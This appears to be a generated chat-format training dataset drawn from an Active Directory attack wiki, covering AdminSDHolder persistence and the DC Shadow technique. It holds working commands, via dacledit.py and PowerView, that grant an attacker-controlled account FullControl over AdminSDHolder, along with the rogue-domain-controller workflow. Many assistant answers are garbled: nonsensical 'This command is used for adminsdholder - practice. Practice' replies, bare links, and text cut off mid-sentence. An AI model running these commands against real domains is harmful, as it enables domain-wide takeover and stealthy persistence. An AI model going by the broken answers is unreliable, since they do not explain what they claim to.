worth noting the members of the Domain Controllers and Read-Only Domain Controllers groups are not protected (source), only the groups are.\n\n> [!TIP]\n> When talking about AdminSdHolder, the AdminCount attribute is usually mentioned. This attribute is automatically set on an object when adding it to a protected group. Originally, the purpose was to improve SDProp's performance. AdminCount cannot be used for malicious purposes and is now mainly informative.\n> \n> Also, AdminCount will block inheritance. This means that setting inheritence in the ACE added to AdminSdHolder will be mostly useless. ", "metadata": {"corpus_index": 1184, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain AdminSDHolder - Practice"}, {"role": "assistant", "content": "Once sufficient privileges are obtained, attackers can abuse AdminSdHolder to get persistence on the domain by modifying the AdminSdHolder object's DACL. \n\nLet's say an attacker adds the following ACE to AdminSdHolder's DACL: attackercontrolleduser: Full Control.\n\nAt the next run of SDProp, attackercontrolleduser will have a GenericAll privilege over all protected objects (Domain Admins, Account Operators, and so on).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n``bash\ndacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'\n`\n\nAdminSdHolder's DACL can then be inspected with the same utility.\n\n`bash\ndacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'\n`\n\n=== Windows\n\nThis can be done in PowerShell with Add-DomainObjectAcl from PowerSploit's PowerView module.\n\n`powershell\nAdd-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All\n`\n\nAdminSdHolder's DACL can then be inspected with Get-DomainObjectAcl.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain AdminSDHolder - Practice", "response": "Once sufficient privileges are obtained, attackers can abuse AdminSdHolder to get persistence on the domain by modifying the AdminSdHolder object's DACL. \n\nLet's say an attacker adds the following ACE to AdminSdHolder's DACL: attackercontrolleduser: Full Control.\n\nAt the next run of SDProp, attackercontrolleduser will have a GenericAll privilege over all protected objects (Domain Admins, Account Operators, and so on).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n``bash\ndacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'\n`\n\nAdminSdHolder's DACL can then be inspected with the same utility.\n\n`bash\ndacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'\n`\n\n=== Windows\n\nThis can be done in PowerShell with Add-DomainObjectAcl from PowerSploit's PowerView module.\n\n`powershell\nAdd-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All\n`\n\nAdminSdHolder's DACL can then be inspected with Get-DomainObjectAcl.\n\n``powershell", "metadata": {"corpus_index": 1185, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for AdminSDHolder - Practice"}, {"role": "assistant", "content": "Once sufficient privileges are obtained, attackers can abuse AdminSdHolder to get persistence on the domain by modifying the AdminSdHolder object's DACL. \n\nLet's say an attacker adds the following ACE to AdminSdHolder's DACL: attackercontrolleduser: Full Control.\n\nAt the next run of SDProp, attackercontrolleduser will have a GenericAll privilege over all protected objects (Domain Admins, Account Operators, and so on).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n``bash\ndacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'\n`\n\nAdminSdHolder's DACL can then be inspected with the same utility.\n\n`bash\ndacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'\n`\n\n=== Windows\n\nThis can be done in PowerShell with Add-DomainObjectAcl from PowerSploit's PowerView module.\n\n`powershell\nAdd-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All\n`\n\nAdminSdHolder's DACL can then be inspected with Get-DomainObjectAcl.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for AdminSDHolder - Practice", "response": "Once sufficient privileges are obtained, attackers can abuse AdminSdHolder to get persistence on the domain by modifying the AdminSdHolder object's DACL. \n\nLet's say an attacker adds the following ACE to AdminSdHolder's DACL: attackercontrolleduser: Full Control.\n\nAt the next run of SDProp, attackercontrolleduser will have a GenericAll privilege over all protected objects (Domain Admins, Account Operators, and so on).\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n``bash\ndacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'\n`\n\nAdminSdHolder's DACL can then be inspected with the same utility.\n\n`bash\ndacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'\n`\n\n=== Windows\n\nThis can be done in PowerShell with Add-DomainObjectAcl from PowerSploit's PowerView module.\n\n`powershell\nAdd-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All\n`\n\nAdminSdHolder's DACL can then be inspected with Get-DomainObjectAcl.\n\n``powershell", "metadata": {"corpus_index": 1185, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the dacledit.py command to adminsdholder - practice"}, {"role": "assistant", "content": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the dacledit.py command to adminsdholder - practice", "response": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'", "metadata": {"corpus_index": 1186, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "dacledit.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through AdminSDHolder - Practice"}, {"role": "assistant", "content": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through AdminSDHolder - Practice", "response": "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'", "metadata": {"corpus_index": 1186, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'`?"}, {"role": "assistant", "content": "This command is used for adminsdholder - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `dacledit.py -action 'write' -rights 'FullControl' -principal 'controlled_object' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'`?", "response": "This command is used for adminsdholder - practice. Practice", "metadata": {"corpus_index": 1186, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the dacledit.py command for adminsdholder - practice"}, {"role": "assistant", "content": "dacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the dacledit.py command for adminsdholder - practice", "response": "dacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'", "metadata": {"corpus_index": 1187, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "dacledit.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out AdminSDHolder - Practice during a pentest?"}, {"role": "assistant", "content": "dacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out AdminSDHolder - Practice during a pentest?", "response": "dacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'", "metadata": {"corpus_index": 1187, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `dacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'`?"}, {"role": "assistant", "content": "This command is used for adminsdholder - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `dacledit.py -action 'read' -target-dn 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' 'domain'/'user':'password'`?", "response": "This command is used for adminsdholder - practice. Practice", "metadata": {"corpus_index": 1187, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Add-DomainObjectAcl for adminsdholder - practice?"}, {"role": "assistant", "content": "Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Add-DomainObjectAcl for adminsdholder - practice?", "response": "Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All", "metadata": {"corpus_index": 1188, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Add-DomainObjectAcl"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out AdminSDHolder - Practice during a pentest?"}, {"role": "assistant", "content": "Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out AdminSDHolder - Practice during a pentest?", "response": "Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All", "metadata": {"corpus_index": 1188, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All`?"}, {"role": "assistant", "content": "This command is used for adminsdholder - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=LOCAL' -PrincipalIdentity spotless -Verbose -Rights All`?", "response": "This command is used for adminsdholder - practice. Practice", "metadata": {"corpus_index": 1188, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Inspect all AdminSdHolder's DACL"}, {"role": "assistant", "content": "Get-DomainObjectAcl -SamAccountName \"AdminSdHolder\" -ResolveGUIDs"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Inspect all AdminSdHolder's DACL", "response": "Get-DomainObjectAcl -SamAccountName \"AdminSdHolder\" -ResolveGUIDs", "metadata": {"corpus_index": 1189, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Inspect all AdminSdHolder's DACL?"}, {"role": "assistant", "content": "Get-DomainObjectAcl -SamAccountName \"AdminSdHolder\" -ResolveGUIDs"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Inspect all AdminSdHolder's DACL?", "response": "Get-DomainObjectAcl -SamAccountName \"AdminSdHolder\" -ResolveGUIDs", "metadata": {"corpus_index": 1189, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Inspect specific rights an object has on AdminSdHolder (example with a user)"}, {"role": "assistant", "content": "sid = Get-DomainUser \"someuser\" | Select-Object -ExpandProperty objectsid\nGet-DomainObjectAcl -SamAccountName \"AdminSdHolder\" -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq $sid}\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Inspect specific rights an object has on AdminSdHolder (example with a user)", "response": "sid = Get-DomainUser \"someuser\" | Select-Object -ExpandProperty objectsid\nGet-DomainObjectAcl -SamAccountName \"AdminSdHolder\" -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq $sid}\n```\n\n:::", "metadata": {"corpus_index": 1190, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Inspect specific rights an object has on AdminSdHolder (example with a user)?"}, {"role": "assistant", "content": "sid = Get-DomainUser \"someuser\" | Select-Object -ExpandProperty objectsid\nGet-DomainObjectAcl -SamAccountName \"AdminSdHolder\" -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq $sid}\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Inspect specific rights an object has on AdminSdHolder (example with a user)?", "response": "sid = Get-DomainUser \"someuser\" | Select-Object -ExpandProperty objectsid\nGet-DomainObjectAcl -SamAccountName \"AdminSdHolder\" -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq $sid}\n```\n\n:::", "metadata": {"corpus_index": 1190, "category": "active_directory", "source_file": "docs/src/ad/persistence/adminsdholder.md", "page_title": "AdminSDHolder", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Access controls?"}, {"role": "assistant", "content": "https://www.slideshare.net/harmj0y/an-ace-in-the-hole-stealthy-host-persistence-via-security-descriptors\n\nhttps://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf\n\nDPERSIST on AD CS : https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Access controls?", "response": "https://www.slideshare.net/harmj0y/an-ace-in-the-hole-stealthy-host-persistence-via-security-descriptors\n\nhttps://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf\n\nDPERSIST on AD CS : https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", "metadata": {"corpus_index": 1191, "category": "active_directory", "source_file": "docs/src/ad/persistence/dacl.md", "page_title": "🛠️ Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Access controls"}, {"role": "assistant", "content": "https://www.slideshare.net/harmj0y/an-ace-in-the-hole-stealthy-host-persistence-via-security-descriptors\n\nhttps://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf\n\nDPERSIST on AD CS : https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Access controls", "response": "https://www.slideshare.net/harmj0y/an-ace-in-the-hole-stealthy-host-persistence-via-security-descriptors\n\nhttps://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf\n\nDPERSIST on AD CS : https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", "metadata": {"corpus_index": 1191, "category": "active_directory", "source_file": "docs/src/ad/persistence/dacl.md", "page_title": "🛠️ Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about DC Shadow - Theory"}, {"role": "assistant", "content": "The idea behind this persistence technique is to have an attacker-controlled machine act as a domain controller (shadow DC) to push changes onto the domain by forcing other domain controllers to replicate.\n\nThere are two requirements for a machine to act as a domain controller:\n\n1. Be registered as a DC in the domain**: this is done by;\n 1. modifying the computer's SPN (ServicePrincipalName) to GC/$HOSTNAME.$DOMAIN/$DOMAIN\n 2. adding an entry like CN=$HOSTNAME,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=$DOMAIN with the following attribute values:\n * objectClass: server\n * dNSHostName: $HOSTNAME.$DOMAIN\n * serverReference: CN=$HOSTNAME,CN=Computers,DC=$DOMAIN\n2. Be able to request and/or respond to specific RPC calls: DRSBind, DRSUnbind, DRSCrackNames, DRSAddEntry, DRSReplicaAdd, DRSReplicaDel, DRSGetNCChanges.\n\nBelow is the attack workflow (step 1 & 2 can be switched if need be):\n\n1. Register the workstation that will act as the shadow DC\n 1. add the required entry in CN=Configuration\n 2. modify the workstation's SPN\n2. Prepare the changes to be pushed onto the domain (with calls to DRSAddEntry)\n3. Push the changes by forcing another legitimate DC to replicate from the workstation with a DRSReplicaAdd call, which automatically makes a DRSGetNCChanges call from the legitimate DC to the shadow DC.\n4. Unregister the workstation so it is not longer considered to be a DC (by a DRSReplicaDel call and by reverting changes made to CN=Configuration and the workstation's SPN). \n\n![](<./assets/Adding entry to Configuration container.png>)\n\n
(step 1.1) add the entry to CN=Configuration
\n\n![](<./assets/Modifying the workstation SPN.png>)\n\n(step 1.2) modify the workstation's SPN{.caption}\n\n![](<./assets/DRSUAPI network capture.png>)\n\nAn example of DRSUAPI traffic for a successful DC Shadow attack{.caption}\n\nIt is important to note that this technique can be used as a \"meta\" one, in the sense th"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about DC Shadow - Theory", "response": "The idea behind this persistence technique is to have an attacker-controlled machine act as a domain controller (shadow DC) to push changes onto the domain by forcing other domain controllers to replicate.\n\nThere are two requirements for a machine to act as a domain controller:\n\n1. Be registered as a DC in the domain**: this is done by;\n 1. modifying the computer's SPN (ServicePrincipalName) to GC/$HOSTNAME.$DOMAIN/$DOMAIN\n 2. adding an entry like CN=$HOSTNAME,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=$DOMAIN with the following attribute values:\n * objectClass: server\n * dNSHostName: $HOSTNAME.$DOMAIN\n * serverReference: CN=$HOSTNAME,CN=Computers,DC=$DOMAIN\n2. Be able to request and/or respond to specific RPC calls: DRSBind, DRSUnbind, DRSCrackNames, DRSAddEntry, DRSReplicaAdd, DRSReplicaDel, DRSGetNCChanges.\n\nBelow is the attack workflow (step 1 & 2 can be switched if need be):\n\n1. Register the workstation that will act as the shadow DC\n 1. add the required entry in CN=Configuration\n 2. modify the workstation's SPN\n2. Prepare the changes to be pushed onto the domain (with calls to DRSAddEntry)\n3. Push the changes by forcing another legitimate DC to replicate from the workstation with a DRSReplicaAdd call, which automatically makes a DRSGetNCChanges call from the legitimate DC to the shadow DC.\n4. Unregister the workstation so it is not longer considered to be a DC (by a DRSReplicaDel call and by reverting changes made to CN=Configuration and the workstation's SPN). \n\n![](<./assets/Adding entry to Configuration container.png>)\n\n
(step 1.1) add the entry to CN=Configuration
\n\n![](<./assets/Modifying the workstation SPN.png>)\n\n(step 1.2) modify the workstation's SPN{.caption}\n\n![](<./assets/DRSUAPI network capture.png>)\n\nAn example of DRSUAPI traffic for a successful DC Shadow attack{.caption}\n\nIt is important to note that this technique can be used as a \"meta\" one, in the sense th", "metadata": {"corpus_index": 1192, "category": "active_directory", "source_file": "docs/src/ad/persistence/dcshadow/index.md", "page_title": "DC Shadow", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform DC Shadow - Theory?"}, {"role": "assistant", "content": "The idea behind this persistence technique is to have an attacker-controlled machine act as a domain controller (shadow DC) to push changes onto the domain by forcing other domain controllers to replicate.\n\nThere are two requirements for a machine to act as a domain controller:\n\n1. Be registered as a DC in the domain**: this is done by;\n 1. modifying the computer's SPN (ServicePrincipalName) to GC/$HOSTNAME.$DOMAIN/$DOMAIN\n 2. adding an entry like CN=$HOSTNAME,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=$DOMAIN with the following attribute values:\n * objectClass: server\n * dNSHostName: $HOSTNAME.$DOMAIN\n * serverReference: CN=$HOSTNAME,CN=Computers,DC=$DOMAIN\n2. Be able to request and/or respond to specific RPC calls: DRSBind, DRSUnbind, DRSCrackNames, DRSAddEntry, DRSReplicaAdd, DRSReplicaDel, DRSGetNCChanges.\n\nBelow is the attack workflow (step 1 & 2 can be switched if need be):\n\n1. Register the workstation that will act as the shadow DC\n 1. add the required entry in CN=Configuration\n 2. modify the workstation's SPN\n2. Prepare the changes to be pushed onto the domain (with calls to DRSAddEntry)\n3. Push the changes by forcing another legitimate DC to replicate from the workstation with a DRSReplicaAdd call, which automatically makes a DRSGetNCChanges call from the legitimate DC to the shadow DC.\n4. Unregister the workstation so it is not longer considered to be a DC (by a DRSReplicaDel call and by reverting changes made to CN=Configuration and the workstation's SPN). \n\n![](<./assets/Adding entry to Configuration container.png>)\n\n
(step 1.1) add the entry to CN=Configuration
\n\n![](<./assets/Modifying the workstation SPN.png>)\n\n(step 1.2) modify the workstation's SPN{.caption}\n\n![](<./assets/DRSUAPI network capture.png>)\n\nAn example of DRSUAPI traffic for a successful DC Shadow attack{.caption}\n\nIt is important to note that this technique can be used as a \"meta\" one, in the sense th"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform DC Shadow - Theory?", "response": "The idea behind this persistence technique is to have an attacker-controlled machine act as a domain controller (shadow DC) to push changes onto the domain by forcing other domain controllers to replicate.\n\nThere are two requirements for a machine to act as a domain controller:\n\n1. Be registered as a DC in the domain**: this is done by;\n 1. modifying the computer's SPN (ServicePrincipalName) to GC/$HOSTNAME.$DOMAIN/$DOMAIN\n 2. adding an entry like CN=$HOSTNAME,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=$DOMAIN with the following attribute values:\n * objectClass: server\n * dNSHostName: $HOSTNAME.$DOMAIN\n * serverReference: CN=$HOSTNAME,CN=Computers,DC=$DOMAIN\n2. Be able to request and/or respond to specific RPC calls: DRSBind, DRSUnbind, DRSCrackNames, DRSAddEntry, DRSReplicaAdd, DRSReplicaDel, DRSGetNCChanges.\n\nBelow is the attack workflow (step 1 & 2 can be switched if need be):\n\n1. Register the workstation that will act as the shadow DC\n 1. add the required entry in CN=Configuration\n 2. modify the workstation's SPN\n2. Prepare the changes to be pushed onto the domain (with calls to 